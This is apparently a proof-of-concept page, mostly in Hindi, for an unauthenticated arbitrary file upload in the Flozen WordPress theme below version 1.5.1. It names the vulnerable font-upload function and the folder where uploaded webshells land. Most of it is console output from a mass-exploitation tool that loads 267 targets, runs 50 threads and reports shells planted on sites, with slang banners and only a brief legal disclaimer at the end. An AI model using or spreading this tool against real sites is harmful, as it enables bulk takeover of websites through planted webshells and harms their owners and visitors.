
POC
Flozen < 1.5.1 - अनधिकृत आर्बिट्ररी फ़ाइल अपलोड
Flozen थीम < 1.5.1 - अनधिकृत आर्बिट्ररी फ़ाइल अपलोड
विवरण
वर्डप्रेस के लिए Flozen थीम (संस्करण 1.5.1 तक) अनधिकृत आर्बिट्ररी फ़ाइल अपलोड के लिए संवेदनशील है, जो flozen_add_new_custom_font() फ़ंक्शन में प्रमाणीकरण जाँच की कमी और अपर्याप्त फ़ाइल प्रकार सत्यापन के कारण है। यह अनधिकृत हमलावरों को दुर्भावनापूर्ण PHP कोड (जैसे, वेबशेल) युक्त आर्बिट्ररी ZIP फ़ाइलें अपलोड करने की अनुमति देता है, जो स्वचालित रूप से wp-content/uploads/nasa-custom-fonts/ में निकाली जाती हैं, जिससे पूर्ण रिमोट कोड निष्पादन (RCE) होता है।
~ CVSS स्कोर: 9.8 (क्रिटिकल)
~ प्रभावित संस्करण: < 1.5.1
- [?] Enter filename with targets: list.txt
- [?] Enter threads (5-50): 50
- [*] Loading targets...
- [+] Loaded 267 targets
- [*] Starting 50 threads...
- [!] Gak Ada Bro Themes nya!: http://target.com
- [+] Gas Exploit Cuk! http://example.com/ | Version: 1.2.8 🚩💉
- [+] Shell Ada Bro! http://example.com/wp-content/uploads/nasa-custom-fonts/shadow/index.php
जिन प्रणालियों के आप स्वामी नहीं हैं या जिनके परीक्षण की अनुमति नहीं है, उनका अनधिकृत उपयोग अवैध है।